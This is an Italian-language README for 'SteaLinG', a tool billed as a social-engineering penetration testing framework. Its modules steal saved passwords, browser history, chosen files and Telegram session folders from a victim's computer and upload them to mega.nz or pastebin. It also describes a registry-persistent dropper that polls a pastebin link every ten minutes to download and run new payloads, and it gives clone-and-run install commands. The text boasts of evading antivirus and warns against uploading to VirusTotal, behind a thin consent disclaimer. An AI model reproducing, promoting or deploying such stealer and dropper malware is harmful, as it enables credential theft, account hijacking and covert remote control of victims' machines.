
Il SteaLinG è un framework di penetration testing open-source progettato per l'ingegneria sociale.
SteaLinG è un framework di penetration testing open-source progettato per l'ingegneria sociale.
Dopo l'attacco, puoi caricarlo sul dispositivo della vittima ed eseguirlo.
Questo è solo per scopi di test e può essere utilizzato solo dove è stato dato esplicito consenso. Non usarlo per scopi illegali.
A causa della chiusura di anonfiles.com ho modificato il codice, e ora carica i risultati su mega.nz
| Modulo | Breve descrizione |
|---|---|
| Estrai password | Ruba tutte le password salvate, carica il file su mega - pastebin |
| Estrai cronologia | Scarica la cronologia del browser, carica il file su mega - pastebin |
| Estrai file | Ruba file dal disco rigido con l'estensione desiderata, carica su mega |
| Hijack della sessione Telegram | Hijacker della sessione Telegram, carica su Mega |
| Dropper | Vedi sotto |
| Modulo | Breve descrizione |
|---|---|
| 1-Hijack della sessione Telegram | Hijacker della sessione Telegram |
C:\Users<nome pc>\AppData\Roaming\Telegram DesktopC:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
Una volta spostata questa cartella, con tutto il suo contenuto, sul tuo dispositivo nello stesso percorso, dovrai semplicemente eseguire l'azione richiesta. Lo strumento si occuperà di tutto, e tutto ciò che devi fare è fornire la tua Email e Password sul sito https://mega.nz/. Il primo passo è navigare fino alla posizione del file tdata, e poi convertirlo in un file zip. Se Telegram funziona correttamente, allora questo errore non si verificherà. Se si verifica un errore, significa che Telegram è aperto, e dovresti terminare i suoi processi. Noterai che questo comportamento è dannoso, quindi l'ho evitato completamente usando try ed except nel codice. Il nome del file di archivio è usato nel nome del dispositivo della vittima, perché se hai più dispositivi, è possibile differenziarli. Dopo di che, invierai una richiesta per il file zip sul sito mega usando la Email e Password. Questo è tutto, non è rilevato da nessun antivirus.
| Modulo |
|---|
| 2- Dropper |
.exe o .png, o qualsiasi altra estensione importante. L'importante è che il link termini con un'estensione (.qualsiasi estensione).
La seconda cosa è ottenere la API key da te, che fornirai anche tu. Puoi registrarti e cliccare sulla parola "API" per trovarla, e poi prendere nota di username e password.
La prima cosa da fare è creare un paste privato sul sito. Dopo di che, aggiunge l'URL che hai fornito e ti dà il file eseguibile (exe). La sua funzione è di aggiungersi al registro del dispositivo in due modi diversi quando viene eseguito su qualsiasi dispositivo.
Prima, apre il sito Pastebin e inserisce il paste speciale che hai creato. Poi prende il paste URL, scarica il suo contenuto e lo esegue. Inoltre, puoi inserire un altro URL in qualsiasi momento. Questo è molto normale perché il dropper controlla l'URL ogni 10 minuti. Se trova un nuovo URL, scarica il suo contenuto, si connette ad esso e continua a funzionare. Non devi fare nulla. Pertanto, ogni 10 minuti, puoi accedere al tuo dispositivo da qualsiasi luogo.
3- Supporto Linux
4-Ora puoi scegliere tra Mega o Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python3 -m pip install -r requirements.txt
python SteaLinG.py
* Non caricare su VirusTotal.com perché questo strumento non funzionerà col tempo.
* VirusTotal condivide le firme con le aziende antivirus.
* Di nuovo, non essere un idiota!

